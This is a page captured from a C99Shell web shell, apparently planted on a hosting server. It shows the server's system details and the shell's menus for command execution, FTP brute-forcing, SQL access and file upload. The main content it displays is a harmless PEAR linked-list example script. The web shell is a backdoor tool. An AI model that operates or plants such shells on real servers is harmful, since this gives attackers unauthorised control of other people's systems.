!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/opt/alt/php51/usr/share/doc/pear/Structures_LinkedList/examples/   drwxr-xr-x
Free 979.94 GB of 1859.98 GB (52.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     single_link_example.php (2.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

require 'Structures/LinkedList/Single.php';

/* To do anything useful with a linked list, you need to
 * extend the Node class to hold data associated with the
 * node. In this case, we're just going to hold a single
 * integer in the $_my_number property.
 */
class LinkNodeTester extends Structures_LinkedList_SingleNode {
    protected 
$_my_number;
    protected 
$_my_letter;

    function 
__construct($num$letter) {
        
$this->_my_number $num;
        
$this->_my_letter $letter;
    }

    function 
getNumber() {
        return 
$this->_my_number;
    }

    function 
getLetter() {
        return 
$this->_my_letter;
    }

    function 
setNumb($numb) {
        
$this->_my_number $numb;
    }

    function 
__toString() {
        return 
"{$this->getNumber()}";
    }
}

/* To enable key=>value iteration, we must override the default key()
 * method in Structures_LinkedList_Single to return a meaningful value */
class LinkListTester extends Structures_LinkedList_Single {
    function 
key() {
        return 
$this->current()->getLetter();
    }
}

/* Now we'll create some instances of the new class */
$node1 = new LinkNodeTester(1'a');
$node2 = new LinkNodeTester(2'b');
$node3 = new LinkNodeTester(3'c');
$node4 = new LinkNodeTester(4'd');
$node5 = new LinkNodeTester(5'e');

/* Start by instantiating a list object.
 * You can either pass the first node to the constructor,
 * or leave it null and add nodes later.
 */
$list = new LinkListTester($node1); // 1

/* appendNode() adds a node to the end of the list */
$list->appendNode($node2); // 1-2

/* prependNode() adds a node to the start of the list */
$list->prependNode($node3); // 3-1-2

/* insertNode($new_node, $reference_node, $before) adds a node
 * before the reference node if the third parameter is true,
 * or after the reference node if the third parameter is false
 */
$list->insertNode($node4$node2true); // 3-1-4-2

/* current() returns the current pointer node in the list */
$link $list->current(); // 1

/* You can iterate through a list with the next() method */
do {
    print 
$link->getNumber();
} while (
$link $list->next()); // 1-4-2

/* rewind() resets the pointer to the root node of the list */
$link $list->rewind(); // 3

/* You can also iterate through a list with foreach() */
foreach ($list as $bull) {
  print 
$bull->getNumber();
// 3-1-4-2

/* Override the key() method to enable $key=>$value iteration */
foreach ($list as $key=>$value) {
  print 
"$key => $value\n";
}

/* end() resets the pointer to the last node of the list */
$link $list->end(); // 2

/* You can iterate backwards through a list with previous() */
do {
    print 
$link->getNumber();
} while (
$link $list->previous()); // 2-4-1-3
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.2039 ]--